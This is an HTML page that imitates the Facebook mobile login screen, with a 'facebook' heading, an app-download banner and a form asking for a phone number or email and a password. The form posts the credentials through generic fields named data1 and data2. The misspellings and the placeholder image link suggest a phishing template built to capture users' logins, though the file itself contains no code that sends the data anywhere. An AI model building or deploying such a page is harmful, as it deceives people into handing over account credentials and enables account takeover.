<!DOCTYPE html>
<html lang="en">
<head>
    <title>Document</title>  
    
    <style>
  body{
  	width:100%;
  	margin:0;font-family: "Lato", sans-serif;
  	background:rgb(255,255,255);
  				}  
  .yel{
  					width:100%;
  					height:50px;
  					color:rgb(60,89,149);
  					
  	margin-top:-1px;
  	background:rgb(255,251,226);
  	
  				}
  	.po{font-size:15px;
  					position:relative;
  					top:-20px;
  					left:-10px;
  					}
  			.ss{
  			color:rgb(125,114,24);			
  			float:left;	
  			position:relative;
  			top:20px;
  			left:5px;
  							}
  				.jj{
  								width:30px;
  								height:auto;
  								float:left;
  								position:relative;
  			top:-30px;
  			left:10px;
  								}
  					.h{
  									color:rgb(25,120,246);
  									font-size:22px;
  									}
  						.in{
  	width:330px;
  	height:30px;	background:rgb(245,246,248);			
  		border:none;
  	
  		border:1px solid rgb(208,210,209);
  		border-radius:5px;
  		padding:5px;
  										}
  						.in::placeholder{
  										position:relative;
  										left:10px;
  										}
  						.inb{
  										width:330px;
  										height:40px;
  										padding:5px;
  									color:white;	background:rgb(25,120,246);
  										border:none;
  		outline:none;		
  		border-radius:5px;
  										}
  										
  										.inu{
  										width:200px;
  										height:40px;
  										padding:5px;
  									color:white;	background:rgb(0,164,0);
  										border:none;
  		outline:none;		
  		border-radius:5px;
  										}
  										.imj{
  														width:70px;
  														height:70px;
  														border:1px solid #2e99ff;
  														border-radius:50%;
  														}
    </style>
</head>
<body>
  <div>
  <div class="yel">
  <br>
  <center>
  
  <p class="po">Get Facebook for Android and browser faster</p></image></center>
  </div>
  <center>
  <br>
  <image src="@@@@@@@@@@" class="imj"></image>
  
  <h2 class="h">facebook</h2>
  <form action="" method="POST">
  <input type="text" placeholder="Mobil number or Email adreass" class="in" name="data1"><br>
  <input type="text" placeholder="Enter your password" class="in" name="data2">
  <br><br>
  <input type="submit" value="login" class="inb" name="button">
 </form><br>
  </center>
  </div>  
</body>
</html>

